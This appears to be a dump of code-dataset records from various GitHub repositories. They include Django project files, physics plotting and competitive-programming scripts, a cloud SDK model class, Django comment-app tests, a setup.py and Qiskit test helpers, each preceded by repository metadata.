Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('admin/', admin.site.urls),
path('api/postings/', include('postings.api.urls', namespace='api-postings'))
]
|
[
"henrysempire111gmail.com"
] |
henrysempire111gmail.com
|
3817408a598bef35193652dc85f27df0d7823622
|
8023bdc11776a09b0fff0e9b581bbd42b8013afa
|
/h2tau/PlotEM.py
|
7e972f1232900d42d001e07c09b25d5c20d09127
|
[] |
no_license
|
uwcms/UWHiggs
|
0785d431b12df07e872a00b36279227781a6c1de
|
53c1bd2671dea2553f8bbc5dcdf56a823ccf36f6
|
refs/heads/master
| 2021-01-16T19:32:45.480056 | 2014-02-06T02:11:54 | 2014-02-06T02:11:54 | 8,310,494 | 0 | 2 | null | 2014-10-10T13:03:07 | 2013-02-20T10:02:08 |
C++
|
UTF-8
|
Python
| false | false | 1,396 |
py
|
'''
Make inclusive e-mu (Z + ttbar) control plots
'''
import os
import glob
from FinalStateAnalysis.PlotTools.Plotter import Plotter
jobid = os.environ['jobid']
output_dir = os.path.join('results', jobid, 'plots', 'em')
samples = [
'Zjets_M50',
'WZ*',
'WW*',
'ZZ*',
'TT*',
'WplusJets*',
"data_MuEG*",
]
files = []
lumifiles = []
for x in samples:
files.extend(glob.glob('results/%s/AnalyzeEM/%s.root' % (jobid, x)))
lumifiles.extend(glob.glob('inputs/%s/%s.lumicalc.sum' % (jobid, x)))
plotter = Plotter(files, lumifiles, output_dir)
# Override ordering
plotter.mc_samples = [
'TTplusJets_madgraph',
'WplusJets_madgraph',
'Zjets_M50',
'WZJetsTo3LNu*',
'WW*',
'ZZJetsTo4L*',
]
sqrts = 7 if '7TeV' in jobid else 8
plotter.plot_mc_vs_data('em', 'emMass', rebin=10, leftside=False,
xaxis='m_{e#mu} (GeV)')
plotter.add_cms_blurb(sqrts)
plotter.save('mass')
plotter.plot_mc_vs_data('em', 'mPt')
plotter.save('mPt')
plotter.plot_mc_vs_data('em', 'ePt')
plotter.save('ePt')
plotter.plot_mc_vs_data('em', 'mAbsEta')
plotter.save('mAbsEta')
plotter.plot_mc_vs_data('em', 'eAbsEta')
plotter.save('eAbsEta')
plotter.plot_mc_vs_data('em', 'nvtx')
plotter.save('nvtx')
plotter.plot_mc_vs_data('em', 'bjetCSVVeto')
plotter.save('bjetCSVVeto')
plotter.plot_mc_vs_data('em', 'bjetVeto')
plotter.save('bjetVeto')
|
[
"[email protected]"
] | |
152113e43cceee7807ab807267ca54fb2a1d1c19
|
5922398212b6e113f416a54d37c2765d7d119bb0
|
/python/Search a 2D Matrix.py
|
28456dbb8f7a1a1330809a51885131a419f64dcf
|
[] |
no_license
|
CrazyCoder4Carrot/lintcode
|
e777f73e1fdfe3b8abc9dbfc07d26602bf614151
|
33dcd7f0e2d9bee58840a3370837cb2db82de1eb
|
refs/heads/master
| 2021-01-09T20:38:59.813198 | 2017-01-16T22:34:26 | 2017-01-16T22:34:26 | 60,287,619 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 352 |
py
|
class Solution:
"""
@param matrix, a list of lists of integers
@param target, an integer
@return a boolean, indicate whether matrix contains target
"""
def searchMatrix(self, matrix, target):
# write your code here
for row in matrix:
if target in row:
return True
return False
|
[
"[email protected]"
] | |
2bb6b170f6c1fa3e3e754886a338b80c7b74302c
|
59a688e68421794af64bfe69a74f64b2c80cd79d
|
/math_riddles/floor_problem_challenge.py
|
ddbc10db108624c04c65eb5008db0f6129fe587a
|
[] |
no_license
|
hearues-zueke-github/python_programs
|
f23469b306e057512aadecad0ca0a02705667a15
|
d24f04ca143aa93f172210a4b9dfdd9bf1b79a15
|
refs/heads/master
| 2023-07-26T00:36:56.512635 | 2023-07-17T12:35:16 | 2023-07-17T12:35:16 | 117,093,746 | 6 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,089 |
py
|
#! /usr/bin/python3
from fractions import Fraction as frac
from math import floor as fl
if __name__=='__main__':
# solve x*floor(x*floor(x*floor(x))) = n, where n = 2020 e.g.
def f(x):
return x*fl(x*fl(x*fl(x)))
n = 2020
numer = 1
denom = 1
# a = frac(1, 1)
is_increment_numerator = True
while True:
a = frac(numer, denom)
y = f(a)
fl_y = fl(y)
print("numer: {}, denom: {}, float(y): {}".format(numer, denom, float(y)))
if (y.numerator % y.denominator == 0) and (fl_y == n):
break
if is_increment_numerator:
numer += 1
a_new = frac(numer, denom)
# fl_a_new = fl(f(a_new))
if f(a_new)>n:
# if fl_a_new>n:
is_increment_numerator = False
a = a_new
else:
denom += 1
a_new = frac(numer, denom+1)
# fl_a_new = fl(f(a_new))
if f(a_new)<n:
# if fl_a_new<n:
is_increment_numerator = True
a = a_new
|
[
"[email protected]"
] | |
5cd36692ca51be88c22fee7de2ef5d3cd9b98621
|
551b75f52d28c0b5c8944d808a361470e2602654
|
/huaweicloud-sdk-cce/huaweicloudsdkcce/v3/model/node_nic_spec.py
|
964ad72f81427f81c112f83c177d65a55488e0f1
|
[
"Apache-2.0"
] |
permissive
|
wuchen-huawei/huaweicloud-sdk-python-v3
|
9d6597ce8ab666a9a297b3d936aeb85c55cf5877
|
3683d703f4320edb2b8516f36f16d485cff08fc2
|
refs/heads/master
| 2023-05-08T21:32:31.920300 | 2021-05-26T08:54:18 | 2021-05-26T08:54:18 | 370,898,764 | 0 | 0 |
NOASSERTION
| 2021-05-26T03:50:07 | 2021-05-26T03:50:07 | null |
UTF-8
|
Python
| false | false | 3,422 |
py
|
# coding: utf-8
import pprint
import re
import six
class NodeNicSpec:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'primary_nic': 'NicSpec',
'ext_nics': 'list[NicSpec]'
}
attribute_map = {
'primary_nic': 'primaryNic',
'ext_nics': 'extNics'
}
def __init__(self, primary_nic=None, ext_nics=None):
"""NodeNicSpec - a model defined in huaweicloud sdk"""
self._primary_nic = None
self._ext_nics = None
self.discriminator = None
if primary_nic is not None:
self.primary_nic = primary_nic
if ext_nics is not None:
self.ext_nics = ext_nics
@property
def primary_nic(self):
"""Gets the primary_nic of this NodeNicSpec.
:return: The primary_nic of this NodeNicSpec.
:rtype: NicSpec
"""
return self._primary_nic
@primary_nic.setter
def primary_nic(self, primary_nic):
"""Sets the primary_nic of this NodeNicSpec.
:param primary_nic: The primary_nic of this NodeNicSpec.
:type: NicSpec
"""
self._primary_nic = primary_nic
@property
def ext_nics(self):
"""Gets the ext_nics of this NodeNicSpec.
扩展网卡
:return: The ext_nics of this NodeNicSpec.
:rtype: list[NicSpec]
"""
return self._ext_nics
@ext_nics.setter
def ext_nics(self, ext_nics):
"""Sets the ext_nics of this NodeNicSpec.
扩展网卡
:param ext_nics: The ext_nics of this NodeNicSpec.
:type: list[NicSpec]
"""
self._ext_nics = ext_nics
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, NodeNicSpec):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"[email protected]"
] | |
be980be27bb8f62cb951489a5a2b039bb1c37cb9
|
c8cee25ecb60ca3e6ce5e24c37db57f82f9858f6
|
/ConversionPDFaExcelconPythonPandas/pdfaexcelconpandas.py
|
f2ae448d09dcaa10e19f8e115b76df442765633a
|
[] |
no_license
|
mecomontes/Python
|
a0b4a0b69ae33ad3623e908731710563392d1615
|
daba4247cca90c43a979e3e3f292cd7b8951b3d0
|
refs/heads/master
| 2023-05-30T05:24:41.999196 | 2020-03-23T02:30:09 | 2020-03-23T02:30:09 | 249,317,310 | 1 | 0 | null | 2023-05-22T22:42:36 | 2020-03-23T02:29:38 |
Python
|
UTF-8
|
Python
| false | false | 339 |
py
|
from tabula import read_pdf
df = read_pdf('../Pdfs/Libro1.pdf',
guess=False,
pandas_options={'skiprows':[0,1],'header':None}
)
df.head()
headers = ['Mes','Dia','Año','PptSalpo','TempMax','TempMin','Ppt','Wind','Hum','Solar']
df.columns = headers
df.head()
df.to_excel('../Xls/Libro1.xlsx')
|
[
"[email protected]"
] | |
155ca9d2c3c3e780023de74a3f730658e9eb5a3e
|
eb36f5ee5b97aae79e7da87602fd4da293a52892
|
/tests/op/test_op_setitem.py
|
af18cd175b6825ed13b183153485f125ea4ab78b
|
[
"MIT"
] |
permissive
|
turiya/toy-auto-diff
|
e3f3adc803d0f2c34d9211a62bc646fa491372e2
|
bd54cd4d34b482498927449608d47039368dcd8a
|
refs/heads/master
| 2020-06-20T03:25:14.975249 | 2019-03-02T04:58:30 | 2019-03-02T04:58:30 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 704 |
py
|
import numpy as np
import auto_diff as ad
from .util import NumGradCheck
class TestOpSetItem(NumGradCheck):
def test_forward(self):
x_val = np.random.random((3, 4))
x = ad.variable(x_val)
y = ad.setitem(x, (1, 2), ad.constant(5.0))
actual = y.forward()[1, 2]
expect = 5.0
self.assertEqual(x.shape, y.shape)
self.assertTrue(np.allclose(expect, actual), (expect, actual))
def test_backward(self):
with self.assertRaises(NotImplementedError):
x_val = np.random.random((3, 4))
x = ad.variable(x_val)
y = ad.setitem(x, (1, 2), ad.constant(5.0))
self.numeric_gradient_check(y, {}, [x])
|
[
"[email protected]"
] | |
fd521e1e8e0199069605ae7e221b0c9872a0793f
|
de56ee2369d36c93ad802f0359f3274b9a3f0a25
|
/photos/views.py
|
24f001752b2e3f0c656bd3f2ee705b695289f932
|
[] |
no_license
|
Anubhav722/asynchronous-celery-tasks
|
bdfd485b6c6b2777a4712ad64ebabf347e717654
|
a21f055e8e524db662d21f60dac2f8daab075f63
|
refs/heads/master
| 2021-01-23T00:45:41.631402 | 2017-05-31T10:47:44 | 2017-05-31T10:47:44 | 92,840,568 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 438 |
py
|
from django.shortcuts import render
from django.views.generic.list import ListView
from photos.models import Photo
from feedback.forms import FeedbackForm
# Create your views here.
class PhotoView(ListView):
model = Photo
template_name = 'photos/photo_list.html'
paginate_by = 24
def get_context_data(self, **kwargs):
context = super(PhotoView, self).get_context_data(**kwargs)
context['form'] = FeedbackForm()
return context
|
[
"[email protected]"
] | |
5864bdacd428ec82508f2d42b00accffcb92af2e
|
8410bb5a2e8849bb3a554b95ddc713d88f3440c4
|
/aws-dev/awsdev9/venv/Lib/site-packages/dns/rdtypes/ANY/DS(1).py
|
7d457b2281e3fa4a816885299c994457c23f6ba4
|
[
"MIT"
] |
permissive
|
PacktPublishing/-AWS-Certified-Developer---Associate-Certification
|
ae99b6c1efb30e8fab5b76e3d8c821823a4cd852
|
b9838b4e038b42ad1813a296379cbbc40cab6286
|
refs/heads/master
| 2022-11-03T04:37:49.014335 | 2022-10-31T05:42:19 | 2022-10-31T05:42:19 | 219,964,717 | 13 | 11 |
MIT
| 2021-06-02T00:57:45 | 2019-11-06T09:54:09 |
Python
|
UTF-8
|
Python
| false | false | 950 |
py
|
# Copyright (C) Dnspython Contributors, see LICENSE for text of ISC license
# Copyright (C) 2003-2007, 2009-2011 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import dns.rdtypes.dsbase
class DS(dns.rdtypes.dsbase.DSBase):
"""DS record"""
|
[
"[email protected]"
] | |
beb326dc1932346c4a7e3a63941053a44da0e48a
|
d2eb7bd335175edd844a3e6c1c633ee0dc2dbb25
|
/contests_atcoder/arc110/arc110_a.py
|
72fdc5c78f226f000d840020f629b98b4bbf4129
|
[
"BSD-2-Clause"
] |
permissive
|
stdiorion/competitive-programming
|
5020a12b85f1e691ceb0cacd021606a9dc58b72c
|
e7cf8ef923ccefad39a1727ca94c610d650fcb76
|
refs/heads/main
| 2023-03-27T01:13:42.691586 | 2021-03-08T08:05:53 | 2021-03-08T08:05:53 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 641 |
py
|
from itertools import accumulate,chain,combinations,groupby,permutations,product
from collections import deque,Counter
from bisect import bisect_left,bisect_right
from math import gcd,sqrt,sin,cos,tan,degrees,radians
from fractions import Fraction
from decimal import Decimal
from functools import reduce
import sys
input = lambda: sys.stdin.readline().rstrip()
#from sys import setrecursionlimit
#setrecursionlimit(10**7)
MOD=10**9+7
INF=float('inf')
def lcm_base(x, y):
return (x * y) // gcd(x, y)
def lcm(*numbers):
return reduce(lcm_base, numbers, 1)
n = int(input())
print(---+-+--+---+----+-1 + lcm(*list(range(2, n + 1))))
|
[
"[email protected]"
] | |
b03d70f00d9f929eb2e0d6a9404207541522dfe7
|
52cb25dca22292fce4d3907cc370098d7a57fcc2
|
/BAEKJOON/수학1/1748_수 이어 쓰기1.py
|
167d4e44ab35c67945bc83a25c6beb23aeb37edd
|
[] |
no_license
|
shjang1013/Algorithm
|
c4fc4c52cbbd3b7ecf063c716f600d1dbfc40d1a
|
33f2caa6339afc6fc53ea872691145effbce0309
|
refs/heads/master
| 2022-09-16T12:02:53.146884 | 2022-08-31T16:29:04 | 2022-08-31T16:29:04 | 227,843,135 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 178 |
py
|
# 새로운 수의 자릿수를 출력하기
N = input()
n = len(N)
count = 0
for i in range(n-1):
count += 9*(10**i)*(i+1)
count += (int(N)-10**(n-1)+1)*n
print(count)
|
[
"[email protected]"
] | |
c73ec9c62a678fa9a4f062d57defffbd993e56da
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/21/usersdata/75/8322/submittedfiles/exercicio24.py
|
ff41fdd82bbba07417472c07bcf3f1e9ba01e933
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 206 |
py
|
# -*- coding: utf-8 -*-
from __future__ import division
import math
i=1
a= int(input('Digite o valor do primeiro número:'))
b= int(input('Digite o valor do segundo número:'))
while i<=(a and b):
|
[
"[email protected]"
] | |
e2a45d6a3e24edb3074e7e521b9f78b91a415f56
|
6e6f97f416c06aada38c3a9db23eed7517bfaa6d
|
/comment/tests/test_models/test_followers.py
|
0a11fadb19eb1f3dec4e17ab1490bebd3bb2f26c
|
[
"MIT"
] |
permissive
|
ZendaInnocent/sogea
|
1735ad047539c09a5c81e196a7a1963022452098
|
54cf257856cae451ad87e2396b8e44a34c0c6daf
|
refs/heads/main
| 2023-08-23T07:18:45.741826 | 2021-10-28T13:19:06 | 2021-10-28T13:19:06 | 365,683,816 | 0 | 0 |
MIT
| 2021-05-09T06:29:57 | 2021-05-09T06:29:57 | null |
UTF-8
|
Python
| false | false | 7,294 |
py
|
from unittest.mock import patch
from django.contrib.contenttypes.models import ContentType
from comment.conf import settings
from comment.models import Follower
from comment.tests.base import BaseCommentTest
class FollowerModelTest(BaseCommentTest):
@classmethod
def setUpTestData(cls):
super().setUpTestData()
cls.comment_test_follow = cls.create_comment(cls.content_object_1)
cls.email = '[email protected]'
cls.follower = Follower.objects.create(
email=cls.email,
username='test',
content_object=cls.comment_test_follow
)
def test_can_create_entry(self):
self.assertIsNotNone(self.follower)
def test_string_value(self):
self.assertEqual(str(self.follower), f'{str(self.comment_test_follow)} followed by {self.email}')
self.assertEqual(repr(self.follower), f'{str(self.comment_test_follow)} followed by {self.email}')
class FollowerManagerTest(BaseCommentTest):
@classmethod
def setUpTestData(cls):
super().setUpTestData()
cls.manager = Follower.objects
cls.follower_email = '[email protected]'
cls.unfollower_email = '[email protected]'
cls.comment_test_follow = cls.create_comment(cls.content_object_1)
cls.comment_without_email = cls.create_comment(cls.content_object_1, user=cls.user_without_email)
cls.follower = cls.manager.create(
email=cls.follower_email,
username='test',
content_object=cls.comment_test_follow
)
def test_is_following(self):
self.assertTrue(self.manager.is_following(self.follower_email, self.comment_test_follow))
self.assertFalse(self.manager.is_following(self.unfollower_email, self.comment_test_follow))
def test_follow_return_none_on_missing_email(self):
self.assertIsNone(self.manager.follow('', 'username', self.comment_test_follow))
def test_follow_return_none_if_email_is_already_follow(self):
self.assertTrue(self.manager.is_following(self.follower_email, self.comment_test_follow))
self.assertIsNone(self.manager.follow(self.follower_email, 'username', self.comment_test_follow))
def test_follow_create_follower_instance(self):
initial_count = self.manager.count()
follower = self.manager.follow(self.unfollower_email, 'username', self.comment_test_follow)
self.assertIsInstance(follower, self.manager.model)
self.assertEqual(self.manager.count(), initial_count + 1)
def test_unfollow_delete_follower_instance(self):
initial_count = self.manager.count()
self.assertTrue(self.manager.is_following(self.follower_email, self.comment_test_follow))
self.manager.unfollow(self.follower_email, self.comment_test_follow)
self.assertEqual(self.manager.count(), initial_count - 1)
def test_toggle_follow_return_false_on_missing_email(self):
email = None
result = self.manager.toggle_follow(email=email, username='test', model_object=self.comment_test_follow)
self.assertFalse(result)
def test_toggle_follow_for_follower(self):
"""set the follower to unfollower and return false"""
self.assertTrue(self.manager.is_following(self.follower_email, self.comment_test_follow))
result = self.manager.toggle_follow(
email=self.follower_email,
username='test_user',
model_object=self.comment_test_follow
)
self.assertFalse(result)
self.assertFalse(self.manager.is_following(self.follower_email, self.comment_test_follow))
def test_toggle_follow_for_unfollower(self):
"""set the unfollower to follower and return true"""
self.assertFalse(self.manager.is_following(self.unfollower_email, self.comment_test_follow))
result = self.manager.toggle_follow(
email=self.unfollower_email,
username='test_user',
model_object=self.comment_test_follow
)
self.assertTrue(result)
self.assertTrue(self.manager.is_following(self.unfollower_email, self.comment_test_follow))
def test_follow_parent_thread_for_comment_no_email(self):
self.assertFalse(self.comment_without_email.email)
self.assertFalse(self.manager.is_following(self.comment_without_email.email, self.comment_without_email))
self.manager.follow_parent_thread_for_comment(self.comment_without_email)
self.assertFalse(self.manager.is_following(self.comment_without_email.email, self.comment_without_email))
@patch.object(settings, 'COMMENT_ALLOW_SUBSCRIPTION', False)
def test_follow_parent_thread_for_comment_child_comment(self):
child_comment = self.create_comment(self.content_object_1, user=self.user_2, parent=self.comment_without_email)
# the parent (thread) will not be followed on creating child comment
self.assertFalse(self.manager.is_following(child_comment.email, child_comment.content_object))
# the parent comment (thread) is not followed yet
self.assertFalse(self.manager.is_following(child_comment.email, self.comment_without_email))
# child comment cannot be followed
self.assertFalse(self.manager.is_following(child_comment.email, child_comment))
self.manager.follow_parent_thread_for_comment(child_comment)
# the parent (thread) will not be followed on creating child comment
self.assertFalse(self.manager.is_following(child_comment.email, child_comment.content_object))
# the parent is now followed
self.assertTrue(self.manager.is_following(child_comment.email, self.comment_without_email))
# child comment cannot be followed
self.assertFalse(self.manager.is_following(child_comment.email, child_comment))
@patch.object(settings, 'COMMENT_ALLOW_SUBSCRIPTION', False)
def test_follow_parent_thread_for_comment_parent_comment(self):
parent_comment = self.create_comment(self.content_object_1, user=self.user_2)
# the parent (thread) is not followed yet
self.assertFalse(self.manager.is_following(parent_comment.email, parent_comment.content_object))
# parent comment is not followed yet
self.assertFalse(self.manager.is_following(parent_comment.email, parent_comment))
self.manager.follow_parent_thread_for_comment(parent_comment)
# the parent (thread) is now followed
self.assertTrue(self.manager.is_following(parent_comment.email, parent_comment.content_object))
# parent comment is now followed
self.assertTrue(self.manager.is_following(parent_comment.email, parent_comment))
def test_get_all_followers_for_model_object(self):
followers = self.manager.filter_for_model_object(self.comment_test_follow)
content_type = ContentType.objects.get_for_model(self.comment_test_follow)
self.assertNotEqual(followers.count(), 0)
self.assertEqual(
list(followers),
list(self.manager.filter(content_type=content_type, object_id=self.comment_test_follow.id))
)
def test_get_get_emails_for_model_object(self):
emails = self.manager.get_emails_for_model_object(self.comment_test_follow)
self.assertIn(self.comment_test_follow.email, emails)
|
[
"[email protected]"
] | |
0914435a0dd3e06ec45e07ea57a79f9c4688419e
|
471a036309c05b59243033f2480e27e19268ec55
|
/src/london/setup.py
|
574ffec30ba669a92a1fc8544c5c6533d47e5545
|
[
"BSD-2-Clause"
] |
permissive
|
avelino/votacao_paredao_bbb
|
1bbf33b9ec00f033db5b1d558190135315d50b03
|
875ac157b207fee80be6841f9b17c41b7069e15d
|
refs/heads/master
| 2021-01-20T12:17:48.362512 | 2012-07-13T05:41:44 | 2012-07-13T05:41:44 | 4,928,781 | 0 | 0 | null | 2020-07-27T11:05:32 | 2012-07-06T17:51:03 |
Python
|
UTF-8
|
Python
| false | false | 1,682 |
py
|
import london
import os
import sys
# Downloads setuptools if not find it before try to import
try:
import ez_setup
ez_setup.use_setuptools()
except ImportError:
pass
from setuptools import setup
def fullsplit(path, result=None):
"""
Split a pathname into components (the opposite of os.path.join) in a
platform-neutral way. Copied from Django.
"""
if result is None:
result = []
head, tail = os.path.split(path)
if head == '':
return [tail] + result
if head == path:
return result
return fullsplit(head, [tail] + result)
packages = []
data_files = []
london_dir = 'london'
for dirpath, dirnames, filenames in os.walk(london_dir):
for i, dirname in enumerate(dirnames):
if dirname.startswith('.'): del dirnames[i]
if '__init__.py' in filenames:
packages.append('.'.join(fullsplit(dirpath)))
elif filenames:
data_files.append([dirpath, [os.path.join(dirpath, f) for f in filenames]])
if sys.version_info[0] >= 3:
install_requires = ['distribute', 'Jinja2', 'nose', 'PyDispatcher', 'BeautifulSoup4','python-money',
'tornado','pymongo==2.1.1']
else:
install_requires = ['distribute', 'Jinja2', 'nose', 'simplejson', 'PyDispatcher',
'BeautifulSoup==3.2.0','python-money','tornado','pymongo==2.1.1']
setup(
name='London',
version=london.__version__,
#url='',
author=london.__author__,
license=london.__license__,
packages=packages,
data_files=data_files,
scripts=['london/bin/london-admin.py','london/bin/london-create-project.py'],
install_requires=install_requires,
#setup_requires=[],
)
|
[
"[email protected]"
] | |
4c9cbf1a4a291e0732c209b2377e48be7480b156
|
ec1059f4ccea10deb2cb8fd7f9458700a5e6ca4c
|
/venv/Lib/site-packages/qiskit/test/utils.py
|
05433cc98a74738a7ca38e52e181892c3a231072
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
shivam675/Quantum-CERN
|
b60c697a3a7ad836b3653ee9ce3875a6eafae3ba
|
ce02d9198d9f5a1aa828482fea9b213a725b56bb
|
refs/heads/main
| 2023-01-06T20:07:15.994294 | 2020-11-13T10:01:38 | 2020-11-13T10:01:38 | 330,435,191 | 1 | 0 |
MIT
| 2021-01-17T16:29:26 | 2021-01-17T16:29:25 | null |
UTF-8
|
Python
| false | false | 3,962 |
py
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2018.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Utils for using with Qiskit unit tests."""
import logging
import os
import unittest
from enum import Enum
from itertools import product
from qiskit import __path__ as qiskit_path
class Path(Enum):
"""Helper with paths commonly used during the tests."""
# Main SDK path: qiskit/
SDK = qiskit_path[0]
# test.python path: qiskit/test/python/
TEST = os.path.normpath(os.path.join(SDK, '..', 'test', 'python'))
# Examples path: examples/
EXAMPLES = os.path.normpath(os.path.join(SDK, '..', 'examples'))
# Schemas path: qiskit/schemas
SCHEMAS = os.path.normpath(os.path.join(SDK, 'schemas'))
# Sample QASMs path: qiskit/test/python/qasm
QASMS = os.path.normpath(os.path.join(TEST, 'qasm'))
def setup_test_logging(logger, log_level, filename):
"""Set logging to file and stdout for a logger.
Args:
logger (Logger): logger object to be updated.
log_level (str): logging level.
filename (str): name of the output file.
"""
# Set up formatter.
log_fmt = ('{}.%(funcName)s:%(levelname)s:%(asctime)s:'
' %(message)s'.format(logger.name))
formatter = logging.Formatter(log_fmt)
# Set up the file handler.
file_handler = logging.FileHandler(filename)
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
if os.getenv('STREAM_LOG'):
# Set up the stream handler.
stream_handler = logging.StreamHandler()
stream_handler.setFormatter(formatter)
logger.addHandler(stream_handler)
# Set the logging level from the environment variable, defaulting
# to INFO if it is not a valid level.
level = logging._nameToLevel.get(log_level, logging.INFO)
logger.setLevel(level)
class _AssertNoLogsContext(unittest.case._AssertLogsContext):
"""A context manager used to implement TestCase.assertNoLogs()."""
# pylint: disable=inconsistent-return-statements
def __exit__(self, exc_type, exc_value, tb):
"""
This is a modified version of TestCase._AssertLogsContext.__exit__(...)
"""
self.logger.handlers = self.old_handlers
self.logger.propagate = self.old_propagate
self.logger.setLevel(self.old_level)
if exc_type is not None:
# let unexpected exceptions pass through
return False
if self.watcher.records:
msg = 'logs of level {} or higher triggered on {}:\n'.format(
logging.getLevelName(self.level), self.logger.name)
for record in self.watcher.records:
msg += 'logger %s %s:%i: %s\n' % (record.name, record.pathname,
record.lineno,
record.getMessage())
self._raiseFailure(msg)
class Case(dict):
"""<no description>"""
pass
def generate_cases(docstring, dsc=None, name=None, **kwargs):
"""Combines kwargs in cartesian product and creates Case with them"""
ret = []
keys = kwargs.keys()
vals = kwargs.values()
for values in product(*vals):
case = Case(zip(keys, values))
if docstring is not None:
setattr(case, "__doc__", docstring.format(**case))
if dsc is not None:
setattr(case, "__doc__", dsc.format(**case))
if name is not None:
setattr(case, "__name__", name.format(**case))
ret.append(case)
return ret
|
[
"[email protected]"
] | |
c27e540e1dee4537be8ca6378dc757a16a9ff8d0
|
801510e45d9aebe5c5b8b09a3ce4453a3a11a3ca
|
/django/full_stack_django/amadon/amadon/settings.py
|
c8a2b95ae4b1da6df15ff14bd3426de162c50844
|
[] |
no_license
|
michelleshan/coding_dojo_python_course
|
5581ebca0a645ba7231a2da2d2d64d6c3735bfc4
|
e20e8195950004ef0aa09e6b0f84e7f05bd355e8
|
refs/heads/master
| 2022-11-21T01:34:54.309175 | 2020-07-16T03:29:45 | 2020-07-16T03:29:45 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,103 |
py
|
"""
Django settings for amadon project.
Generated by 'django-admin startproject' using Django 2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '^y#+bl%#tl6dws0l$moo_3o-su_^kjym5l*x!+!dlrhvv#m$+h'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'amadon_app'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'amadon.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'amadon.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
